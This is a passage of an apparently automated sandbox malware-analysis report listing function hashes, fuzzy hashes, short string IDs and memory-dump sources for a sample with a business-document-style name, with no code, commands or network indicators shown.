                                                                                                                                                    • Opcode ID: 9537947b347cf0720ea6ace051dd25e09c68b8bae3ff242e36a1fbd65f746409
                                                                                                                                                    • Instruction ID: c5126c3b91cfc2186254de500047603063755f6216dbcf16a4d13fe39d8d12a6
                                                                                                                                                    • Opcode Fuzzy Hash: 9537947b347cf0720ea6ace051dd25e09c68b8bae3ff242e36a1fbd65f746409
                                                                                                                                                    • Instruction Fuzzy Hash: 8D21D2706003045FCB14EB68E8057AE7FEAEF89300F408939E00AD7696DF749E0A8B91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 8xR$8xR
                                                                                                                                                    • API String ID: 0-3303630891
                                                                                                                                                    • Opcode ID: f606e5b7da1a57cd79ee0fc08ab2d9cbb746a8d36ad43160e4a26a07e3ba41ff
                                                                                                                                                    • Instruction ID: eb603373ead61c4b21f857323794db976b48bb671bebf91932c5980745319c08
                                                                                                                                                    • Opcode Fuzzy Hash: f606e5b7da1a57cd79ee0fc08ab2d9cbb746a8d36ad43160e4a26a07e3ba41ff
                                                                                                                                                    • Instruction Fuzzy Hash: D111A035B002099FCB68DF699858BAB7BF2EF89300F14402AE505D73C0EA70CD46DBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: DM$T!M4
                                                                                                                                                    • API String ID: 0-2088102914
                                                                                                                                                    • Opcode ID: b5d8f9f024eac026950866314b2773108168fc7c4a1e1434ee5bba521de9001b
                                                                                                                                                    • Instruction ID: c3dcb03bacd18db5e6502a31ceb37f8fe0a22af8f5e79eace14384aacad12006
                                                                                                                                                    • Opcode Fuzzy Hash: b5d8f9f024eac026950866314b2773108168fc7c4a1e1434ee5bba521de9001b
                                                                                                                                                    • Instruction Fuzzy Hash: BC11C87890920AEFCF15DFA4E4805FC7BF1EF45300B285597C006EB291DB356A86EB56
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: DM$T!M4
                                                                                                                                                    • API String ID: 0-2088102914
                                                                                                                                                    • Opcode ID: 869e50f38006beeffb90191f3c3fc0efb0a688a5e1fd7e0d1a49ab2ce9a75dc5
                                                                                                                                                    • Instruction ID: f34aa5c4fc6efed8bd52c0950a6599e6e7075048bffd5554a42112dec4c46bec
                                                                                                                                                    • Opcode Fuzzy Hash: 869e50f38006beeffb90191f3c3fc0efb0a688a5e1fd7e0d1a49ab2ce9a75dc5
                                                                                                                                                    • Instruction Fuzzy Hash: 2201B578D0520EEFCF10DFA5E0401FC77F1EB44300B24A596C00AEB291DA315A86AB52
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 8xR$8xR
                                                                                                                                                    • API String ID: 0-3303630891
                                                                                                                                                    • Opcode ID: bbf7eb0247b025dccc1a8a2cfb6fc42cefa4e847718ca2347de83923a44a2c8e
                                                                                                                                                    • Instruction ID: c6202fd23d5952012f09d7e8051a452e43e360c8219be889538968ee8578b71a
                                                                                                                                                    • Opcode Fuzzy Hash: bbf7eb0247b025dccc1a8a2cfb6fc42cefa4e847718ca2347de83923a44a2c8e
                                                                                                                                                    • Instruction Fuzzy Hash: 5DE086313C47145BC72CA568A806B9772CADF4A710F600469A6465B2C1DE71DC01CB65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p
                                                                                                                                                    • API String ID: 0-4175582459
                                                                                                                                                    • Opcode ID: 34bf8e95928d5a2ce01e5888a8194a4997de457017a841e9113466da0b20d00c
                                                                                                                                                    • Instruction ID: 4f624ee789ce395e25f248a208e12bb5278e570002e1c8eaad3416e006741a59
                                                                                                                                                    • Opcode Fuzzy Hash: 34bf8e95928d5a2ce01e5888a8194a4997de457017a841e9113466da0b20d00c
                                                                                                                                                    • Instruction Fuzzy Hash: D4C1D570E047568FCB14CB68D4909EEBBB2BF55314B19859AD456DB3A2CB30EC86CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 00B280D6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420618430.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_b20000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 6842923-0
                                                                                                                                                    • Opcode ID: 692d0f4418e8fee31b23ab0082fdd4565fb28e8d41b8d4c470d376d1dd758a4f
                                                                                                                                                    • Instruction ID: 14be6b6fd88c61ec7ed19a49c2b7378de821888f91449971e49921de17c3b42f
                                                                                                                                                    • Opcode Fuzzy Hash: 692d0f4418e8fee31b23ab0082fdd4565fb28e8d41b8d4c470d376d1dd758a4f
                                                                                                                                                    • Instruction Fuzzy Hash: 3521603000A120CFC7686B64F99C66F7BF1BB81312B2489D2E01F854A5DF758C8DEA26
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 00B280D6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420618430.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_b20000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 6842923-0
                                                                                                                                                    • Opcode ID: 79c02f814a016018d3e8c2916776d31237674ed54f7eac4b352b2a1d04c87841
                                                                                                                                                    • Instruction ID: 5fd245b89649fc9b7807fe992dc1e4f3ff8a20780d3fe6ea9added690d9f3839
                                                                                                                                                    • Opcode Fuzzy Hash: 79c02f814a016018d3e8c2916776d31237674ed54f7eac4b352b2a1d04c87841
                                                                                                                                                    • Instruction Fuzzy Hash: 3711213000A120CFC7686B64F89D62F7AF1FB80312B208991F41F85465DF75989DFA26
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 001E9234
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.418758880.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                    • Opcode ID: 03a7d84d8f9e5bf7862938d897d0cc3577b6ae2c2f16bf24c1f07cd5de677ea9
                                                                                                                                                    • Instruction ID: 3c9aa4339c05bd26cca0ee6028c548eec289dee743ac93c1da8f8d9163cb9f17
                                                                                                                                                    • Opcode Fuzzy Hash: 03a7d84d8f9e5bf7862938d897d0cc3577b6ae2c2f16bf24c1f07cd5de677ea9
                                                                                                                                                    • Instruction Fuzzy Hash: 6611F4B1D002499FCB10DFAAC884BAEFBF5EF88324F54842AD519A7250C774A944CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,p
                                                                                                                                                    • API String ID: 0-2091407873
                                                                                                                                                    • Opcode ID: 065d6933208b13e23aad8bdac12460f4e36021581b59de021a4bb6509cdd814d
                                                                                                                                                    • Instruction ID: 9a9d902891226a8de8428e17ddf020207659b0aa615f716860a12243433f3c4f
                                                                                                                                                    • Opcode Fuzzy Hash: 065d6933208b13e23aad8bdac12460f4e36021581b59de021a4bb6509cdd814d
                                                                                                                                                    • Instruction Fuzzy Hash: 4BE1C575A002298FCB68DF68C951BDDBBF2BF88300F1445EAE549A7351DA309E85CF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Dp
                                                                                                                                                    • API String ID: 0-2141643023
                                                                                                                                                    • Opcode ID: 0d5df6cf65fa7518a494a2b8864f248854d5cd6b5ab2a9fa37454347b40fa1ea
                                                                                                                                                    • Instruction ID: 6196e47109cc0d5b2535b23fbd13c5d1078e4bab04c940c3d021dcd6094daf66
                                                                                                                                                    • Opcode Fuzzy Hash: 0d5df6cf65fa7518a494a2b8864f248854d5cd6b5ab2a9fa37454347b40fa1ea
                                                                                                                                                    • Instruction Fuzzy Hash: 29A19D306006109FC718EF79D898A6EBBF2FF89710F158569E5059B3A6CB31ED42CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p
                                                                                                                                                    • API String ID: 0-481844870
                                                                                                                                                    • Opcode ID: 9ba3fd6acd803bb26ce816d04deff95c282f3d1f20480afbad41df19ed571bb0
                                                                                                                                                    • Instruction ID: 7dec7eedf7a235844327a1f0aa0e4381dd971fac7836adcf5a2e8bad595ff80e
                                                                                                                                                    • Opcode Fuzzy Hash: 9ba3fd6acd803bb26ce816d04deff95c282f3d1f20480afbad41df19ed571bb0
                                                                                                                                                    • Instruction Fuzzy Hash: E9A10134A50218DFCB19DFA4D898A9EB7B2FF89310F158259E405AB3A5DB70EC46CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p
                                                                                                                                                    • API String ID: 0-481844870
                                                                                                                                                    • Opcode ID: 894549a401c41b84d7a461a0764c8e2abfae52e863839e37b17a09127adc986b
                                                                                                                                                    • Instruction ID: 507b81d20561afec152dd790126306838f2d9e8c99157ce36f67c94543f0e07f
                                                                                                                                                    • Opcode Fuzzy Hash: 894549a401c41b84d7a461a0764c8e2abfae52e863839e37b17a09127adc986b
                                                                                                                                                    • Instruction Fuzzy Hash: 01710C747006168FDB08EF68C894AAE77F6BF89310B1580A9E905DB3B5DB71ED41CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: pp
                                                                                                                                                    • API String ID: 0-2116140168
                                                                                                                                                    • Opcode ID: 1f3cf64d7dca5386532df9b74faa8019d15eca113167f20bf48ba804173e9205
                                                                                                                                                    • Instruction ID: 6ba63d58e67f732fefde2645f87cfd4d97965f908b711f8f3f649ede91c976a6
                                                                                                                                                    • Opcode Fuzzy Hash: 1f3cf64d7dca5386532df9b74faa8019d15eca113167f20bf48ba804173e9205
                                                                                                                                                    • Instruction Fuzzy Hash: D9515E76600100AFCB4A9FA8D815D697FB3EF8931471A80D9E2099B372DA32DC12DB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p
                                                                                                                                                    • API String ID: 0-4175582459
                                                                                                                                                    • Opcode ID: 77cc5a867cbd49f7588f39eb06673d396f6a960e320553b6cc550c81a3e5bce2
                                                                                                                                                    • Instruction ID: 608d7823203026d6b088ff0700d46acd4c1c480a958b15135fc2f8069ae7ab73
                                                                                                                                                    • Opcode Fuzzy Hash: 77cc5a867cbd49f7588f39eb06673d396f6a960e320553b6cc550c81a3e5bce2
                                                                                                                                                    • Instruction Fuzzy Hash: 4D51E535A006568FCB14DF58C4949AAFBB2FF85320B15C69AD915EB382C730EC56CBD0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,p
                                                                                                                                                    • API String ID: 0-2091407873
                                                                                                                                                    • Opcode ID: 1a91468bf804e54342843bf76e1d46b9b715704daa7896e716f10d4a16231574
                                                                                                                                                    • Instruction ID: 8eeb083414a9adb74561bdf55d2c376911df2e27dd07d489f9d7de217f03da1e
                                                                                                                                                    • Opcode Fuzzy Hash: 1a91468bf804e54342843bf76e1d46b9b715704daa7896e716f10d4a16231574
                                                                                                                                                    • Instruction Fuzzy Hash: 9A51B3357001118FCB19DF69D490AAEBBF6EF89311B15806AEA05DF3A6CB31DD02CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4F]
                                                                                                                                                    • API String ID: 0-1876578708
                                                                                                                                                    • Opcode ID: 47639fe9248c9ab20803173ee331f4aeeda27a5c0d372100ae958838d1b82dd6
                                                                                                                                                    • Instruction ID: 0d187e54e7bc0b9ab4a320247b832af56afad0b919a45e5e377a93819c34d763
                                                                                                                                                    • Opcode Fuzzy Hash: 47639fe9248c9ab20803173ee331f4aeeda27a5c0d372100ae958838d1b82dd6
                                                                                                                                                    • Instruction Fuzzy Hash: A951A1747052008FC715EB69E4497EAB7F3EB85300F19C56AE4058B389DB34AE8ACBD1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p
                                                                                                                                                    • API String ID: 0-481844870
                                                                                                                                                    • Opcode ID: 74c09f303e73c67ba1dd4e8f3a7fb2c03002ab7c35fc2e9f7a78031b09cd640f
                                                                                                                                                    • Instruction ID: bb23f8fb9e450bd596f0115348e2cca87887985aff7b17e226787f9abd6b9eb1
                                                                                                                                                    • Opcode Fuzzy Hash: 74c09f303e73c67ba1dd4e8f3a7fb2c03002ab7c35fc2e9f7a78031b09cd640f
                                                                                                                                                    • Instruction Fuzzy Hash: FF4194307506148FDB48AB68C855AAFB7B7EFC9710F10811EE406AB3E5CF749C468B95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Tep
                                                                                                                                                    • API String ID: 0-914316021
                                                                                                                                                    • Opcode ID: db1461d59b9f88bc61673cec733f6bc58c6872734211d83598d852288b7d261c
                                                                                                                                                    • Instruction ID: 050da4d1a0807664d01ac1f991f237abebeef6003f92257e0daf844c6232ad82
                                                                                                                                                    • Opcode Fuzzy Hash: db1461d59b9f88bc61673cec733f6bc58c6872734211d83598d852288b7d261c
                                                                                                                                                    • Instruction Fuzzy Hash: 2341C330B04105CFEB049F66EC197AEB3B3EFC8315F64D465D6029B298DB74B9858B81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: LRp
                                                                                                                                                    • API String ID: 0-3405495957
                                                                                                                                                    • Opcode ID: 7a4da0917887c8536640729b081b85ed43e50d155e615030aa4639ba960eea83
                                                                                                                                                    • Instruction ID: 8dbbd417283c5ee54d1ca515be9beaae0becac3e4274379d6873560998a87466
                                                                                                                                                    • Opcode Fuzzy Hash: 7a4da0917887c8536640729b081b85ed43e50d155e615030aa4639ba960eea83
                                                                                                                                                    • Instruction Fuzzy Hash: DC41E571604300DFC7059F64D895BAA7BB2FF85300F288879D50ADF2A6DB709C86CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4F]
                                                                                                                                                    • API String ID: 0-1876578708
                                                                                                                                                    • Opcode ID: 04c9f93037a94b32bd58c5af0f557f47b370e52448bd705eb6607e3258a5b41c
                                                                                                                                                    • Instruction ID: 20653af72a7d77ccf9195d9127058788bef626c0ab29aaf1380c0e53a9cd467c
                                                                                                                                                    • Opcode Fuzzy Hash: 04c9f93037a94b32bd58c5af0f557f47b370e52448bd705eb6607e3258a5b41c
                                                                                                                                                    • Instruction Fuzzy Hash: B5419175A083408FC706EB25E4857DA7BB3EF85310F1DC56AD0058B359D735A98ACBD1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p
                                                                                                                                                    • API String ID: 0-481844870
                                                                                                                                                    • Opcode ID: 5551c992ca1f97e92c81697b2db1dd1f8a50f8592e1b399a869427cb4bb5d73a
                                                                                                                                                    • Instruction ID: 5265bb39139a1568acab1a9295e08d1eef95f1247bbe97add788c0e80a066617
                                                                                                                                                    • Opcode Fuzzy Hash: 5551c992ca1f97e92c81697b2db1dd1f8a50f8592e1b399a869427cb4bb5d73a
                                                                                                                                                    • Instruction Fuzzy Hash: 72416D313406105FD318DB28C865F6B7BA6AFC9704F244169E60ACB3E6CE71EC42C790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p
                                                                                                                                                    • API String ID: 0-481844870
                                                                                                                                                    • Opcode ID: 9d2a10539a8f8311939f8acb365b60a74078b6e5c8df1db4dcdbee8c46f1b449
                                                                                                                                                    • Instruction ID: 04f597a85271e5f20426f022a205d5a744186c126d853ec312cc2c326ac1a265
                                                                                                                                                    • Opcode Fuzzy Hash: 9d2a10539a8f8311939f8acb365b60a74078b6e5c8df1db4dcdbee8c46f1b449
                                                                                                                                                    • Instruction Fuzzy Hash: E331D47190D3999FC7134B259C146BA7F70EF87710F1901DBD541EB6E2C6680C0AC766
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p
                                                                                                                                                    • API String ID: 0-481844870
                                                                                                                                                    • Opcode ID: 3e174ba99a568e1579eab3351664fc3218c2f2801f1bdcbd4264cd42cf9919e4
                                                                                                                                                    • Instruction ID: 40422017760a567eb1933acf927f446a23e61ad4d1c437ba02802a97644fc3cd
                                                                                                                                                    • Opcode Fuzzy Hash: 3e174ba99a568e1579eab3351664fc3218c2f2801f1bdcbd4264cd42cf9919e4
                                                                                                                                                    • Instruction Fuzzy Hash: 12314D353406109FD358EB29C865F6B77E6AFC8704F144169E60A8B3E6CE71ED42CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Hp
                                                                                                                                                    • API String ID: 0-671740992
                                                                                                                                                    • Opcode ID: c0ae67f05af8886f257fc7a977005d4b40da385d28faba542bb1c6b2e606ee9b
                                                                                                                                                    • Instruction ID: 5c2428d20e95ac3cd69d02b62fbdb66658c8c707c5ae3dd93944dfb988dc6b31
                                                                                                                                                    • Opcode Fuzzy Hash: c0ae67f05af8886f257fc7a977005d4b40da385d28faba542bb1c6b2e606ee9b
                                                                                                                                                    • Instruction Fuzzy Hash: 5331A1347047508FC729DF68D85496A7BF2EF8A704B1584AAE505DB3A6CB30EC06CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p
                                                                                                                                                    • API String ID: 0-481844870
                                                                                                                                                    • Opcode ID: 52b0f50c913b8ce864772278d415e7936562c5c3b01ccf5f7920a6237dc4d041
                                                                                                                                                    • Instruction ID: fcb707670867f216971ef7298c75f424f46f9365a40d7b98af8116cf83710fe9
                                                                                                                                                    • Opcode Fuzzy Hash: 52b0f50c913b8ce864772278d415e7936562c5c3b01ccf5f7920a6237dc4d041
                                                                                                                                                    • Instruction Fuzzy Hash: F53180316002049FCF198FA4D854A9EBBB2FF89310F1550AAEA0A9B3A5CB71DC56CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
